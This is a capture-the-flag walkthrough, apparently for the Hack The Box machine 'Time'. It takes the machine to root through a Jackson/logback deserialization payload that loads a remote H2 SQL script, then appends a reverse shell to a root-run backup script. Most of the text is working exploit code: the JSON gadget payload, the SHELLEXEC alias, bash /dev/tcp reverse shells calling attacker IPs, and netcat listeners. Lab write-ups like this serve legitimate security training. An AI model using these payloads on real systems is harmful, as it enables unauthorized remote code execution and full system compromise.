image-20201107200513767

Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 20:06 +08
Nmap scan report for 10.10.10.214
Host is up (0.0074s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds


Start to enumerate at the http port

Not able to find other directory other than the index page

image-20201107200901834

Guess this is the only route to user

Tried different input

image-20201107201052773

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

Found some error message.

After googling, with the keyword fasterxml and jackson

we found this CVE

Create a inject.sql with bash reverse shell

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')

Start a python server

python -m SimpleHTTPServer 8000

Also start a listner

nc -nvlp 8080

Finally our payload

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://x.x.x.x/inject.sql'"}]

​ And we got our reverse shell back

image-20201107204418416

Privilege escalation

After some enumeration manage to find something interesting using PSPY64

image-20201107194832954

/usr/bin/timer_backup.sh is run by Root

-rwxrw-rw- 1 pericles pericles 88 Nov 7 12:50 /usr/bin/timer_backup.sh

We have write permission.

echo "bash -i >& /dev/tcp/10.10.14.22/5555 0>&1" >> /usr/bin/timer_backup.sh

and we get a easy root. But the nc will exit somehow less than 30second, another method is to write your public key and enter in SSH

listening on [any] 5555 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.214] 33944
bash: cannot set terminal process group (230926): Inappropriate ioctl for device
bash: no job control in this shell
root@time:/# whoami && id && hostname
whoami && id && hostname
root
uid=0(root) gid=0(root) groups=0(root)
time
root@time:/# exit



root